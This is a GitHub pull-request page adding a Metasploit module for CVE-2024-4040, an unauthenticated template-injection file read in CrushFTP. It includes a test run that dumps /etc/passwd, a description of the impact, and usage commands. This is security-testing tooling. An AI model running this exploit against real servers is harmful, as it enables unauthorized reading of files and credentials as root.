Closed remmons-r7 closed 1 week ago
Thanks for updating this @remmons-r7! Everything looks good to me now. I tested against version 10.5.0 and verified The requested file was correctly retrieved. I'll go ahead and land it.
msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > run verbose=true rhosts=127.0.0.1 targetfile=/etc/passwd
[*] Running module against 127.0.0.1
[] Running automatic check ("set AutoCheck false" to disable) [+] The target is vulnerable. Server-side template injection successful! [] Fetching anonymous session cookie... [*] Using template injection to read file: /etc/passwd [+] File read succeeded! root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
[*] Auxiliary module execution completed
This adds an exploit module that leverages an unauthenticated server-side template injection vulnerability in CrushFTP versions prior to 10.7.1 and prior to 11.1.0 (as well as legacy 9.x versions) to read any files on the server file system as root.
This module leverages an unauthenticated server-side template injection vulnerability in CrushFTP < 10.7.1 and < 11.1.0 (as well as legacy 9.x versions). Attackers can submit template injection payloads to the web API without authentication. When attacker payloads are reflected in the server's responses, the payloads are evaluated. The primary impact of the injection is arbitrary file read as root, which can result in authentication bypass, remote code execution, and NetNTLMv2 theft (when the host OS is Windows and SMB egress traffic is permitted).
Testing
To set up a test environment:
CRUSH_DIR
incrushftp_init.sh
to point to the correct install directory.java -jar CrushFTP.jar
to show a local client GUI interface that can be used to set up an admin account.sudo crushftp_init.sh start
to launch the software on Linux or Mac. If on Windows, runCrushFTP.exe
as an administrator.Verification
use auxiliary/gather/crushftp_fileread_cve_2024_4040
set RHOSTS <TARGET_IP_ADDRESS>
set RPORT <TARGET_PORT>
set TARGETFILE <TARGET_FILE_TO_READ>
set STORE_LOOT false
if you want to display file on the console instead of storing it as loot.run
Example usage
Thank you!